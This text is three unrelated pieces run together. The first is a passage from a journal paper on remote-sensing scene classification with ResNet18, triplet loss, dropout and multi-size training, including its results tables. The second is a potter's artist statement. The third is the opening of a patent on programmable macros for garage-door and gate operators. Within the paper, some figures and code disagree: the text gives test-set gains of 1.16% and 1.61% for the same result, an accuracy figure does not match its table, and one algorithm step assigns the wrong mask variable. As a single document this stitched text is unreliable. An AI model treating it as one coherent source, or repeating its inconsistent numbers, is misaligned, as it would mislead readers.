The feature extractor *f* extracts the features from image *X* to obtain feature *F* ($F \in R^{1 \times M}$, *M* is defined as the length of a feature. In our experiment, we set *M* = 512). Then, the feature *F* is classified by *Classifier* to obtain classification result $C_{F}$ ($C_{F} \in R^{1 \times N}$, *N* is defined as the number of categories). The category probability $O_{F}$ ($O_{F} \in R^{1 \times N}$) is obtained after *softmax*. The category with the highest probability is the final classification result. The overall framework is shown in [Figure 2](#sensors-20-01188-f002){ref-type="fig"}. More details will be given in [Section 2.2.2](#sec2dot2dot2-sensors-20-01188){ref-type="sec"}, [Section 2.2.3](#sec2dot2dot3-sensors-20-01188){ref-type="sec"}, [Section 2.2.4](#sec2dot2dot4-sensors-20-01188){ref-type="sec"}, [Section 2.2.5](#sec2dot2dot5-sensors-20-01188){ref-type="sec"}, [Section 2.2.6](#sec2dot2dot6-sensors-20-01188){ref-type="sec"} and [Section 2.2.7](#sec2dot2dot7-sensors-20-01188){ref-type="sec"}.
### 2.2.2. Feature Extractor *f* {#sec2dot2dot2-sensors-20-01188}
As mentioned above, the quality of a feature directly affects classification accuracy. Many classic networks have excellent feature extraction capabilities, such as AlexNet \[[@B44-sensors-20-01188]\] and VGGNet \[[@B45-sensors-20-01188]\]. Empirically, deeper network structures can extract feature maps with more semantic information. Compared to AlexNet and VGGNet, Resnet \[[@B31-sensors-20-01188]\] has a deeper depth. In addition, Resnet can greatly alleviate the problem of network degradation \[[@B31-sensors-20-01188]\]. Therefore, we choose Resnet18 \[[@B31-sensors-20-01188]\] as the feature extractor to extract features from images. Resnet18 mainly consists of residual blocks, which are composed of stacked convolutional layers and cross-layer connection. The cross-layer connection shortens the distance between non-adjacent layers so that the gradient can be better for back-propagation. On the other hand, it enables the network to automatically learn the path of feature movement. That is to say, once a deeper network path is found to be a better choice, the path will be executed. On the contrary, if the deep path is found to be unsuitable, the path is directly ignored, and the short path is selected, that is, the original feature maps are maintained, which will not affect the performance of the network.
### 2.2.3. Classifier {#sec2dot2dot3-sensors-20-01188}
The *Classifier* consists of a fully connected layer. The input dimension of this *Classifier* is 512, and the output dimension is determined by the number of categories. For example, on the *AID* dataset containing 30 categories, the output dimension of the classifier is set to 30.
### 2.2.4. Dropout {#sec2dot2dot4-sensors-20-01188}
Generally, neural networks have a large number of parameters. However, overfitting is a serious problem in such networks. To alleviate this problem, a dropout layer \[[@B40-sensors-20-01188]\] is used between the feature extractor and the classifier. The working principle is shown in [Figure 3](#sensors-20-01188-f003){ref-type="fig"}. Neurons of the feature extractor are dropped out with a certain probability. This means that a new network with a few parameters is trained in each training. When training is complete, dropout is closed and no longer works. At this time, the classification results of the model are the overall results of all the trained networks, which is similar to the model integration. We know that model integration tends to obtain better results than the single model. From another point of view, dropout breaks the connection between some features and classifiers during training, which weakens the joint adaptability between features and increases the generalization capability of the model.
### 2.2.5. Triplet Loss {#sec2dot2dot5-sensors-20-01188}
The features of remote sensing images from different categories may be very similar, while the features of images from the same category may have large differences. Although CNN has an excellent feature extraction capability, the features extracted by CNN are not effectively used for classification, because of the existence of intra-class diversity and inter-class similarity. To alleviate this problem, we utilize triplet loss to guide the learning of CNN, which is proposed in \[[@B39-sensors-20-01188]\] for the first time to learn a better face embedding. Triple loss is suitable for shortening the distance between images of the same category and widening the distance between images of different categories. The triplet loss formula can be expressed as follows:$$L_{t} = max(d(a,p) - d(a,n) + margin,0).$$
In Equation (4), *a* represents a feature vector of an image, *p* represents a feature vector of an image from the same category, and *n* represents a feature vector of an image of a different category from *a*. *d* represents the Euclidean distance of two vectors. *margin* is the threshold between positive and negative sample pairs, which controls the generation of supervision information. In our experiments, *margin* is set to 1.4. From Equation (4), we can find that the smaller *d*(*a*,*p*) is, the larger *d*(*a*,*n*) is, and the smaller $L_{t}$ is. That means that triple loss can guide the model to shorten the distance between images of the same category and extend the distance between images of different categories, as shown in [Figure 4](#sensors-20-01188-f004){ref-type="fig"}.
For convenience, we define (*a*,*p*) as a positive sample pair and (*a*,*n*) as a negative sample pair. From Equation (4), it can be known that triplet loss needs samples such as (*a*,*p*,*n*) to be the input. According to the rules of the training sample generation, the training of triplet loss can be classified into two types: Offline training and online training. For offline training, the training samples are generated before training. More specifically, three images are extracted from the image set, two of which belong to the same category, and the remaining image belongs to another category, which can be expressed as (*a*,*p*,*n*). According to this rule, a large number of input samples can be generated. It should be noted that most of the generated samples can meet the condition *d*(*a*,*p*) − *d*(*a*,*n*) \< 0, which means that most samples cannot provide loss and the model cannot be further optimized. For online training, the samples (*a*,*p*,*n*) are constructed by using the image vectors of the current training batch. In this paper, we adopt the online training strategy. In order to generate more effective training samples, we adopt the batch hard triplet loss algorithm. The algorithm is shown in Algorithm 1, which is written in python and pytorch style. **Algorithm 1** Batch hard triplet loss**INPUT**: *labels*, *embeddings*, *marginlabels*: the labels of images. *labels*$\in R^{B}$, *B* represents the number of images of a training batch*embeddings*: the feature vectors of images, *embeddings*$\in R^{B \times M}$, *M* represents the length of the feature vectors of the images.**OUTPUT:** triplet_loss**1.** Calculate the European distance *distances* between every two embeddings in *embeddings*, *distances* $\in R^{B \times B}$ ***distances* =** ***calculate_pairwise_distances*(*embeddings*)2.** Calculate the mask of the same category, which is marked as *mask_positive*. *mask_positive* is a matrix of $B \times B$, which only contains 0 or 1. It is used to select distances of the same category. ***mask_positive* =** ***calculate_valid_positive_mask*(*labels*)3.** Calculate the mask of the different category, which is marked as *mask_negative*, *mask_negative* is a matrix of $B \times B$, which only contains 0 or 1. It is used to select distances of the different category. ***mask_positive* =** ***calculate_valid_negative_mask*** **(*labels*)4.** Calculate the distance of hard positive sample pairs, which is marked as *hardest_positive_dist*. *hardest_positive_dist* $\in R^{B \times 1}$. ***hardest_positive_dist* =** **(*distances \* mask_positive.float*()).*max*(*dim=1*)\[*0*\]5.** Calculate the distance of hard negative sample pairs, which is marked as *hardest_negative_dist*. *hardest_negative_dist* $\in R^{B \times 1}$. ***max_dist* =** ***distances.max*(*dim=1, keepdim=True*)\[*0*\]** ***distances* =** ***distances*+** ***max_dist \* *(*mask_negative.eq*(*0*)*.byte*())**.***float*()** ***hardest_negative_dist*** = ***distances.min*(*dim=1*)\[*0*\]6.** Calculate triplet loss, which is marked as *triplet_loss*. *triplet_loss* $\in R$. ***triplet_loss*=(*hardest_positive_dist-hardest_negative_dist+margin*)*.clamp*(*min=0*)** ***triplet_loss* =** ***triplet_loss.mean*()** ***return triplet_loss***
It should be noted that if the feature vector extracted by the feature extractor is directly used to calculate triplet loss, the feature vector with large dimensions will lead to instability of triplet loss. In addition, triplet loss will directly affect the feature extractor, which may have side effects on cross-entropy loss. To this end, we design a fully connected layer to reduce the dimension of the feature vector. The feature vectors after dimensionality reduction are used to calculate triplet loss. It is worth noting that the branch we designed is removable, that is to say, the branch participates in the adjustment of model parameters during training, and is removed after training. In this way, the number of parameters and the computing overhead of the model at the inference stage are not increased, but the gain of accuracy brought by triplet loss is obtained.
### 2.2.6. Training with Multi-Size Images {#sec2dot2dot6-sensors-20-01188}
In general, the lengths of the feature vectors extracted from images with different sizes are not the same. Due to this limitation, only images with a single size can be used for training CNNs, which leads to the lack of data diversity. In order to allow the model to process images with different sizes, we modify the feature extractor. More specifically, inspired by \[[@B38-sensors-20-01188]\], we introduce adaptive pooling, which replaces the last pooling of the Resnet18. The adaptive pooling fixes the size of the final features to 512 × 1 × 1. That is, as long as the input image size is larger than 224 × 224, the dimensions of the features extracted by the extractor are fixed to the size of 512 × 1 × 1. There are two strategies for training models using images with different sizes. One is that the image size is generated randomly in each training epoch. For this strategy, the scale transform present in the two epochs before and after may be relatively large, resulting in large training fluctuations, which increases the difficulty of training. The other is the slow scale transform from a small size to a large size. In this way, the image size used by the two epochs before and after is not much different. The image size used by the last epoch is significantly different from the image size used by the first epoch, which makes the model learn a more versatile "knowledge." In this paper, we adopt the second strategy. More specifically, the model is trained for 10 epochs using images with the size of 224 × 224 first; then, the model is trained for 10 epochs using images with the size of 256 × 256; after that, the model is trained for 10 epochs using images with the size of 288 × 288; finally, the model is trained for 50 epochs using images with the size of 320 × 320.
### 2.2.7. Loss {#sec2dot2dot7-sensors-20-01188}
We combine cross-entropy loss and triplet loss as the final loss. The cross-entropy loss is described as follows: $$L_{c} = - \frac{1}{B} \ast {\sum\limits_{i = 1}^{B}{log\frac{e^{W_{y_{{}_{i}}}^{T}x_{i} + b_{y_{{}_{i}}}}}{\sum\limits_{j = 1}^{n}e^{W_{j}^{T}x_{i} + b_{j}}}}}.$$ $x_{i}$ represents the feature vector extracted by the extractor, and *W* and *b* represent the parameters of *Classifier*, which consists of a fully connected layer. $y_{i}$ indicates the category of the *i-*th image. The final loss is $$L = \alpha L_{c} + \beta L_{t}.$$ In our experiments, $\alpha$ is set to 1 and $\beta$ is set to 0.5.
2.3. Evaluation Metrics {#sec2dot3-sensors-20-01188}
-----------------------
There are many metrics that can evaluate the classification performance of the model, such as quantity disagreement \[[@B46-sensors-20-01188]\], allocation disagreement \[[@B46-sensors-20-01188]\], overall accuracy \[[@B47-sensors-20-01188],[@B48-sensors-20-01188],[@B49-sensors-20-01188],[@B50-sensors-20-01188],[@B51-sensors-20-01188]\], and confusion matrix. At present, many researchers use the overall accuracy and confusion matrix to evaluate the model in the field of remote sensing scene classification \[[@B1-sensors-20-01188],[@B2-sensors-20-01188],[@B13-sensors-20-01188],[@B21-sensors-20-01188],[@B22-sensors-20-01188],[@B23-sensors-20-01188]\]. In order to easily compare our model with the existing algorithms, we also use the overall accuracy and confusion matrix as evaluation metrics.
Overall accuracy (OA) is the ratio of the number of samples correctly predicted by the model on the test set to the total number of samples.
A confusion matrix is a specific matrix that is used to visualize the performance of a model. In this matrix, each row represents the actual categories and each column represents the predicted value \[[@B2-sensors-20-01188]\].
2.4. Hyper Parameters {#sec2dot4-sensors-20-01188}
---------------------
In our experiment, Adam, a gradient descent optimization algorithm, is used for optimizing the parameters of the model, the learning rate is set to 1e--4, and the weight decay rate is set to 5e--4. As mentioned above, to calculate triplet loss, we reduce the dimensions of the features extracted by the extractor. We set the length of the feature vector for calculating triplet loss to 128. The parameter $margin$ of triplet loss is set to 1.4. The weight $\beta$ of triplet loss is set to 0.5, and the weight $\alpha$ of cross-entropy loss is set to 1. The batch size is set to 128. The performance of the model is evaluated every 2 epochs on the validation set. The weights of the model with the best performance is saved after the training of 80 epochs. In addition, the learning rate decays every 32 epochs, and the decay rate is 0.5.
3. Results and Discussion {#sec3-sensors-20-01188}
=========================
In this section, we show the classification performance of the algorithm integrating the three modules on *AID* and *NWPU-RESISC45* datasets and the comparison results with some existing algorithms. After that, we show the ablation experiments of each module.
3.1. Experimental Results on AID Dataset {#sec3dot1-sensors-20-01188}
----------------------------------------
In this section, we show the classification performance of our model on the *AID* dataset and the comparison results with some existing algorithms.
**The classification performance of our model**. [Figure 5](#sensors-20-01188-f005){ref-type="fig"} and [Figure 6](#sensors-20-01188-f006){ref-type="fig"} show the confusion matrices with different partition ratios on the *AID* dataset. In these confusion matrices, each row represents the actual categories, and each column represents the predicted value. The overall accuracy in [Figure 5](#sensors-20-01188-f005){ref-type="fig"} is 92.975%. The overall accuracy in [Figure 6](#sensors-20-01188-f006){ref-type="fig"} is 95.86%, which is 2.885% higher than that in [Figure 5](#sensors-20-01188-f005){ref-type="fig"}.
The classification performance of our model on the *AID* dataset, shown in [Figure 5](#sensors-20-01188-f005){ref-type="fig"} and [Figure 6](#sensors-20-01188-f006){ref-type="fig"}, leads to the following findings:(1)Our model can classify most scenes in the *AID* dataset well. As shown in [Figure 5](#sensors-20-01188-f005){ref-type="fig"}, the classification accuracy of 23 scene categories exceeds 90%, and some categories can be exactly classified by the model, i.e., the accuracy reaches 100%. These categories include forest, meadow, and parking. In addition, the classification accuracies of some categories have reached 99%. As shown in [Figure 6](#sensors-20-01188-f006){ref-type="fig"}, the classification accuracies of 27 scene categories exceed 90%.(2)Our model does not perform well on some scene categories. As shown in [Figure 5](#sensors-20-01188-f005){ref-type="fig"}, resort has the lowest accuracy, which is easily identified as park. Besides, the classification accuracy of squares is also relatively low because it can be easily identified as park or school. It can be found that two similar categories are easily confused.(3)With the increasing number of training data, the classification accuracy of the model can be further improved. Compared to each category in [Figure 5](#sensors-20-01188-f005){ref-type="fig"}, the classification accuracy of each category in [Figure 6](#sensors-20-01188-f006){ref-type="fig"} has improved, especially for category center. The classification accuracy of some categories in [Figure 5](#sensors-20-01188-f005){ref-type="fig"} does not reach 100%, but its accuracy reaches 100% in [Figure 6](#sensors-20-01188-f006){ref-type="fig"}.
**The comparison results with some existing algorithms**. In order to prove the effectiveness of our model, we compared it to 11 algorithms. These algorithms include attention-based deep feature fusion (ADFF) \[[@B13-sensors-20-01188]\], VGG-VD16 with DCF \[[@B47-sensors-20-01188]\], CaffeNet with DCF \[[@B47-sensors-20-01188]\], Multi-Branch Neural Network \[[@B30-sensors-20-01188]\], bag of convolutional features (BOCF) \[[@B48-sensors-20-01188]\], Scene Capture \[[@B49-sensors-20-01188]\], late fusion local binary patterns encoded CNN models architecture (TEX-Net-LF) \[[@B50-sensors-20-01188]\], CaffeNet \[[@B51-sensors-20-01188]\], GoogleNet \[[@B52-sensors-20-01188]\], VGG-16 \[[@B45-sensors-20-01188]\], and fused global saliency-based multiscale multiresolution multistructure local binary pattern feature-local codebookless model feature (salM3LBP-CLM) \[[@B22-sensors-20-01188]\]. The comparison results are shown in [Table 3](#sensors-20-01188-t003){ref-type="table"}.
From [Table 3](#sensors-20-01188-t003){ref-type="table"}, we can find that compared to ADFF, our model has a lower classification accuracy in the 20% Training Ratio experiment, but our model has a higher classification accuracy on the 50% Training Ratio experiment. It is worth mentioning that our model performs better than other algorithms except ADFF on both the 20% Training Ratio experiment and 50% Training Ratio experiment. In general, our model can classify scenes on the *AID* dataset well.
3.2. Experimental Results on NWPU-RESISC45 Dataset {#sec3dot2-sensors-20-01188}
--------------------------------------------------
In this section, the classification performance of our model on the *NWPU-RESISC45* dataset and the comparison results with some existing algorithms are shown.
**The classification performance of our model**. [Figure 7](#sensors-20-01188-f007){ref-type="fig"} and [Figure 8](#sensors-20-01188-f008){ref-type="fig"} show the confusion matrices with different partition ratios on the *NWPU-RESISC45* dataset. In those confusion matrices, each row represents the actual categories, and each column represents the predicted value. The overall accuracy in [Figure 7](#sensors-20-01188-f007){ref-type="fig"} is 88.69%. The overall accuracy in [Figure 8](#sensors-20-01188-f008){ref-type="fig"} is 91.92%, which is 3.23% higher than that in [Figure 7](#sensors-20-01188-f007){ref-type="fig"}.
The classification performance of our model on the *NWPU-RESISC45* dataset, shown in [Figure 7](#sensors-20-01188-f007){ref-type="fig"} and [Figure 8](#sensors-20-01188-f008){ref-type="fig"}, leads to the following findings:(1)The overall accuracy of the model on *NWPU-RESISC45* is lower than that on *AID*. Compared to *AID*, *NWPU-RESISC45* has more images and categories, which increases the difficulty of the dataset to some extent. In [Figure 7](#sensors-20-01188-f007){ref-type="fig"} and [Figure 8](#sensors-20-01188-f008){ref-type="fig"}, most images are used for testing, and a small number of images are used for training. Therefore, the model performs relatively poor on this dataset.(2)For the *NWPU-RESISC45* dataset, intra-class diversity and inter-class similarity are more obvious. From [Figure 7](#sensors-20-01188-f007){ref-type="fig"}, we can find that the classification accuracy of all categories has not reached 100% and the worst is the classification accuracy of palace, which is 52%. We can also find that the probability of palace being identified as church is 14% and being identified as commercial area is 10%. As we know, the three categories are extremely similar.(3)(3) With the increasing number of training data, the classification performance of the model improves. As can be seen from [Figure 8](#sensors-20-01188-f008){ref-type="fig"}, the classification accuracy of palace is 75%, which is 23% higher than that shown in [Figure 7](#sensors-20-01188-f007){ref-type="fig"}. It is worth mentioning that the probability of the palace being identified as a commercial area has dropped significantly, from 10% to 1%. In addition, the classification accuracy of the chaparral increases to 100%, which is the only category where the classification accuracy can reach 100%.
**The comparison results with some existing algorithms**. On the *NWPU-RESISC45* dataset, we also compare the model with 11 algorithms. These algorithms are ADFF \[[@B13-sensors-20-01188]\], CaffeNet with DCF \[[@B47-sensors-20-01188]\], VGG-VD16 with DCF \[[@B47-sensors-20-01188]\], Multi-Branch Neural Network \[[@B30-sensors-20-01188]\], Scene Capture \[[@B49-sensors-20-01188]\], BOCF \[[@B48-sensors-20-01188]\], TEX-Net-LF \[[@B50-sensors-20-01188]\], CaffeNet \[[@B51-sensors-20-01188]\], GoogleNet \[[@B52-sensors-20-01188]\], VGG-16 \[[@B45-sensors-20-01188]\], and salM3LBP-CLM \[[@B22-sensors-20-01188]\]. The comparison results are shown in [Table 4](#sensors-20-01188-t004){ref-type="table"}.
From [Table 4](#sensors-20-01188-t004){ref-type="table"}, it can be found that our model has worse performance compared to ADFF. It should be noted that, in addition to using Resnet to extract feature maps from the image, there is a module called SFT in ADFF, which is specially used to extract features from the attention maps and consists of several stacked convolution layers. Therefore, the parameters and computing overhead of ADFF are larger than our model. From another perspective, it is easier to increase the model parameters to improve performance. Compared to other algorithms, our model is competitive, that is to say, our model is better than the other 10 algorithms except ADFF.
3.3. Ablation Experiment {#sec3dot3-sensors-20-01188}
------------------------
To discuss the effectiveness of the three modules, we perform ablation experiments. The experimental results in this section are shown. In particular, the ***baseline*** indicates the model Resnet18, ***1*** indicates that only the dropout module is added on the basis of ***baseline***, ***2*** indicates that the triple loss module is added on the basis of ***1***, and ***3*** indicates that the module of training with multi-size images is added on the basis of ***2***.
### 3.3.1. Performances on the Training Sets and Validation Sets {#sec3dot3dot1-sensors-20-01188}
We visualize the transformation trend of the model on the training set and the verification set during training. [Figure 9](#sensors-20-01188-f009){ref-type="fig"} shows the transformation trend of loss on training sets, and [Figure 10](#sensors-20-01188-f010){ref-type="fig"} shows the transformation trend of overall accuracy on validation sets.
As shown in [Figure 9](#sensors-20-01188-f009){ref-type="fig"}, the fitting speed of ***1*** is slower than that of ***baseline***, which means that dropout makes the training speed slower. The losses of ***2*** and ***3*** are larger than those of ***1*** and ***baseline***. It can be seen that triplet loss brings more supervision information to the training. It should be noted that the loss of ***3*** fluctuates greatly, which shows that training with a multi-size image increases the complexity of the data.
As shown in [Figure 10](#sensors-20-01188-f010){ref-type="fig"}, it seems that the improvement brought by dropout and triplet loss is not obvious, but there is, in fact, still some improvement. It is worth noting that the overall accuracy of ***3*** on validation sets is the best. In other words, the gain of accuracy brought by training with multi-size images is the most obvious.
### 3.3.2. Performances on the Validation Set and Test Set {#sec3dot3dot2-sensors-20-01188}
In order to verify the effectiveness of the various modules of the algorithm, we perform ablation experiments on the *OPTIMAL* dataset. The specific partition details of the dataset are shown in [Table 1](#sensors-20-01188-t001){ref-type="table"}. The experimental results are shown in [Table 5](#sensors-20-01188-t005){ref-type="table"} and "✓" indicates that the module is used.
As can be seen from [Table 5](#sensors-20-01188-t005){ref-type="table"}, dropout, triplet loss, and training with multi-size images are all effective. First, dropout improves the generalization performance of the model. When only dropout is added, the overall accuracy of the model on the test set improves from 91.08% to 91.61%. When triplet loss is added to the model, the overall accuracy on the verification set improves from 92.12% to 92.23%, which shows that triplet loss brings better classification performance. In addition, the overall accuracy on the test set has been improved from 91.61% to 91.99%, which shows that the generalization ability of the model has also been improved. Similarly, training with multi-size images also improves the classification performance and generalization ability of the model. When it is used, the overall accuracy improves in the verification set and the test set by 0.43% and 0.7% respectively. It is worth noting that with the combined action of the three modules, the overall accuracy of the validation set improves by 0.54%, while the overall accuracy of the test set increases by 1.16%. In addition, the overall accuracy of the model on the test set is higher than that of the verification set, which also shows that the generalization ability of the model has been improved. It is worth mentioning that the addition of modules does not increase the time consumption.
### 3.3.3. Visualization of Models {#sec3dot3dot3-sensors-20-01188}
According to the method provided in \[[@B32-sensors-20-01188]\], we visualize the attention maps of ***baseline***, ***1***, ***2***, and ***3***, as shown in [Figure 11](#sensors-20-01188-f011){ref-type="fig"}.
It can be seen from [Figure 11](#sensors-20-01188-f011){ref-type="fig"} that with the addition of modules, the model pays more attention to the target, and the shape of the attention more closely conforms to the target. It is worth mentioning that the attention of ***3*** is more regular and more fitting to the shape of the category. For example, for harbor and runway, the scope of the model perception is more accurate, more fitting to the shape of the category, while the ***baseline***, ***1***, and ***2*** focusing on the image are more rounded and the center of gravity is more diffuse.
4. Conclusions {#sec4-sensors-20-01188}
==============
In this paper, we take Resnet18 as an example to explore how to improve the classification accuracy of the model without adding other modules. The adaptive pooling makes the model process images with different sizes, enabling multi-size image training. We design a scheme of training with multi-size images to train a network. Specifically, we train the model with images of size 224 × 224 for 10 epochs. Then, the model is trained with images of size 256 × 256 for 10 epochs. After that, we train the model with images of size 288 × 288 for 10 epochs. Finally, the model is trained with images of size 320 × 320 for 50 epochs. The performance of this strategy is higher than that of a single size strategy. The branch dedicated to triplet loss can better guide the learning of the model, which makes the whole model more supervised by loss; thus, the learned features are more discriminative. Dropout embedded between the feature extractor and classifier improves the generalization ability of model. It is worth mentioning that training with multi-size images brings a greater gain in accuracy. On the *OPTIMAL* dataset, the overall accuracy of the verification set improves by 0.54%, while the overall accuracy of the test set improves by 1.61%. In general, training with multi-size images, triplet loss, and dropout are effective.
The authors extend their appreciation to the Deanship of Scientific Research at King Saud University, Saudi Arabia for funding this work through Research Group No. RG-1439-088.
Conceptualization, J.Z. and C.L.; methodology, C.L.; software, C.L.; validation, C.L., J.Z., J.W., X.-G.Y., S.-J.L., Z.A.-M. and A.T.; formal analysis, C.L., Z.A.-M. and A.T.; investigation, C.L.; resources, J.W.; data curation, X.-G.Y., S.-J.L., Z.A.-M. and A.T.; writing---original draft preparation, C.L.; writing---review and editing, J.Z.; visualization, C.L.; supervision, J.Z.; project administration, C.L. and S.-J.L.; funding acquisition, J.W. All authors have read and agreed to the published version of the manuscript.
This research was funded by the National Natural Science Foundation of China under Grant Nos. 61972056 and 61772454, the Natural Science Foundation of Hunan Province of China under Grant No. 2019JJ50666, the "Double First-class" International Cooperation and Development Scientific Research Project of Changsha University of Science and Technology under Grant No. 2019IC34, the Postgraduate Training Innovation Base Construction Project of Hunan Province under Grant No. 2019-248-51, and the Postgraduate Scientific Research Innovation Fund of Hunan Province under Grant No. CX20190696 and CX20190697. The authors extend their appreciation to the Deanship of Scientific Research at King Saud University, Saudi Arabia for funding this work through Research Group No. RG-1439-088.
The authors declare no conflict of interest.
{#sensors-20-01188-f001}
![Overall framework. **C** represents convolution, **B** represents BatchNorm \[[@B42-sensors-20-01188]\], **R** represents activation function ReLU \[[@B43-sensors-20-01188]\], and "**+**" represents element-wise additions. **D** represents dropout. **A** represents adaptive pooling. **F** represents the fully connected layer, which serves Triplet Loss. α is the weight of Cross-Entropy Loss, and β is the weight of Triplet Loss.](sensors-20-01188-g002){#sensors-20-01188-f002}
{#sensors-20-01188-f003}
{#sensors-20-01188-f004}
{#sensors-20-01188-f005}
{#sensors-20-01188-f006}
{#sensors-20-01188-f007}
{#sensors-20-01188-f008}
{#sensors-20-01188-f009}
{#sensors-20-01188-f010}
{#sensors-20-01188-f011}
sensors-20-01188-t001_Table 1
######
Information about datasets.
Datasets Total Images Scene Classes Size Url
----------------- -------------- --------------- ----------- --------------------------------------------------------------
*AID* 10,000 30 600 × 600 <https://captain-whu.github.io/AID/>
*NWPU-RESISC45* 31,500 45 256 × 256 <http://www.escience.cn/people/JunweiHan/NWPU-RESISC45.html>
*OPTIMAL-31* 1860 31 256 × 256 <https://1drv.ms/u/s!Ags4cxbCq3lUguxW3bq0D0wbm1zCDQ>
sensors-20-01188-t002_Table 2
######
Partition ratio of the datasets.
Dataset Training Set (%) Validation Set (%) Test Set (%)
----------------- ------------------ -------------------- --------------
*AID* 10 10 80
*AID* 25 25 50
*NWPU-RESISC45* 5 5 90
*NWPU-RESISC45* 10 10 80
*OPTIMAL* 10 10 80
sensors-20-01188-t003_Table 3
######
The overall accuracy (OA) of the models on *AID*.
Methods 20% Training Ratio 50% Training Ratio Published Year
----------------------------- -------------------- -------------------- ----------------
**Ours** **92.65 ± 0.29** **95.456 ± 0.24** **2019**
ADFF 93.68 ± 0.29 94.75 ± 0.24 2019
VGG-VD16 with DCF 91.57 ± 0.10 93.65 ± 0.18 2018
CaffeNet with DCF 91.35 ± 0.23 93.10 ± 0.27 2018
Multi-Branch Neural Network 89.38 ± 0.32 91.46 ± 0.44 2018
BOCF 85.24 ± 0.33 87.63 ± 0.41 2018
Scene Capture 87.25 ± 0.31 89.43 ± 0.33 2018
TEX-Net-LF 90.87 ± 0.11 92.96 ± 0.18 2017
CaffeNet 86.46 ± 0.47 89.53 ± 0.31 2017
GoogleNet 85.44 ± 0.40 88.39 ± 0.55 2017
VGG-16 86.59 ± 0.29 89.64 ± 0.36 2017
salM3LBP-CLM 86.92 ± 0.35 89.76 ± 0.45 2017
sensors-20-01188-t004_Table 4
######
The OA of the models on *NWPU-RESISC45*.
Methods 10% Training Ratio 20% Training Ratio Published Year
----------------------------- -------------------- -------------------- ----------------
**Ours** **88.30 ± 0.24** **91.62 ± 0.35** **2019**
ADFF 90.58 ± 0.19 91.91 ± 0.23 2019
CaffeNet with DCF 87.59 ± 0.22 89.20 ± 0.27 2018
VGG-VD16 with DCF 87.14 ± 0.19 89.56 ± 0.25 2018
Multi-Branch Neural Network 74.45 ± 0.26 76.38 ± 0.34 2018
Scene Capture 84.84 ± 0.26 86.24 ± 0.36 2018
BOCF 83.65 ± 0.31 85.32 ± 0.17 2018
TEX-Net-LF 86.05 ± 0.24 88.37 ± 0.32 2017
CaffeNet 77.69 ± 0.21 79.85 ± 0.13 2017
GoogleNet 77.19 ± 0.38 78.48 ± 0.26 2017
VGG-16 77.47 ± 0.18 79.79 ± 0.15 2017
salM3LBP-CLM 85.32 ± 0.17 86.59 ± 0.28 2017
sensors-20-01188-t005_Table 5
######
The results of ablation experiments.
--------------------------------------------------------------------------------------------------------------------------------------
Dropout Triplet Loss Training with Multi-Size Images Time on Test Set\ The OA on Validation Set (%) The OA on Test Set (%)
(One Image)
--------- -------------- --------------------------------- ------------------- ------------------------------ ------------------------
0.006s 92.12% 91.08%
**✓** 0.006s 92.12% 91.61%
**✓** **✓** 0.005s 92.23% 91.99%
**✓** **✓** **✓** 0.005s **92.66%** **92.69%**
--------------------------------------------------------------------------------------------------------------------------------------
| |
I have always had a fire in my gut to create with my hands. In 2014, at 52 years old, I “discovered” pottery. It was like an epiphany: From a ball of clay, shaped with my own two hands and using rudimentary tools to color and decorate—of course with a little help from the Kiln Gods–I can create almost anything I can imagine! When I step into my home studio, I feel such an excitement right in my center, like I’ve finally found a way to fully express who I am.
In sculpting, I enjoy the challenge of manipulating the clay to express “lightness” and/or “motion”. It is exciting to try to capture in the clay the stunning beauty and detail found in the natural world.
As much as I love working to shape the clay to create a beautiful form or functional object, it is the application of color and texture that gives me the most excitement. Each piece is a blank canvas for me. I look forward to sitting down with muddy brushes and sharp tools to express myself in each piece, using flowing curves and strong geometric lines that I utilize in my Garden Designs. I push the glazes to give me more by intensive, methodical testing (the chemist in me!), layering and mixing to yield exciting effects.
Always so much more to learn!
Thanks for your interest. | https://artistportfoliomagazine.blog/2017/07/10/janice-briones-weers-q2-art-competition/ |
FIELD OF THE INVENTION
BACKGROUND
SUMMARY
DESCRIPTION
The field of the invention relates to moveable barrier operators and, more specifically, to programming functions to be used at moveable barrier operators.
Different types of moveable barrier operators have been sold over the years and these systems have been used to actuate various types of moveable barriers. For example, garage door operators have been used to move garage doors and gate operators have been used to open and close gates.
Such barrier movement operators may include a wall control unit, which is connected to send signals to a head unit thereby causing the head unit to open and close the barrier. In addition, these operators often include a receiver unit at the head unit to receive wireless transmissions from a hand-held code transmitter or from a keypad transmitter, which may be affixed to the outside of the area closed by the barrier or other structure.
In addition, various functions are performed at moveable barrier operators. For example, users may desire that the door be opened and a light be activated. In another example, the user may desire that a delay period occur before the door opens so that the user can enter their vehicle. In still another example, the door may be opened and a light activated and, after a delay period, the light may be turned off.
Previous systems provided individual commands that operated features of the system by actuating a single switch or some other kind of actuation device. For example, a button was often provided to open the door and another button provided to turn on the light. Unfortunately, in these systems, the user was forced to use the function buttons that were provided or preconfigured with the operator and could not change the functions associated with these buttons or create new functions. In addition, previous systems suffered from the limitation that a single new operation could not be created that combined existing functions. As a result of these problems, user frustration with previous systems occurred since the functions provided with the system could not be changed and/or combined to suit a particular user's requirements.
A system and method is provided that allows a user to select a series of functions to be performed and associates these functions with a macro. The macro can be actuated at a later time with a single actuator and the functions associated with the macro can then be performed. These approaches are simple and cost-effective to implement and provide a user with the flexibility to create new macros of functions sequences that are tailored to their particular requirements or operating environment.
In accordance with the principles described herein, a recording of a macro is initiated. A first action of a plurality of available actions may be performed by a moveable barrier operator and this action is associated with the macro. At least a second of the plurality of actions available at the moveable barrier operator is then selected and the second action is also associated with the macro. A functional sequence specifying the order of performance of the first and second actions is also recorded. The recording of the macro is then terminated. Subsequent to the terminating, the actions associated with the macro may be performed at the moveable barrier operator in accordance with the functional sequence.
Advantageously, the operator may select actions including a command that actuates a moveable barrier, a delay time, a light activation control command, and a mode change command. Other examples of actions are possible.
In another advantage, the actions may be dependent in the present condition of the barrier. This allows a person programming the macro to create functions that only occur when the barrier is in its original state.
Using the above mentioned actions, various macros of function sequences can be developed. In one example of a macro, the first action may include selecting a delay time and the second action may include selecting a barrier operational command to operate a moveable barrier. In another macro example, the first action may include selecting a delay time and the second action may include selecting a barrier operational command to operate a moveable barrier and at least one mode change indication. The mode change indication may include selecting a vacation mode toggle indication. In still another example, the first action may include selecting a delay time and the second action may include selecting a barrier operational command to operate a moveable barrier and a sensor reading. The sensor reading may indicate the detection of an object as the object approaches a sensor positioned near the barrier. In yet another example, the first action may include opening the door, the second action may be turning on the light, the third action may be waiting for a delay time, and the fourth action may be turning off the light. It can be seen that any number of actions can be used in a macro and these actions can be arranged in any sequence.
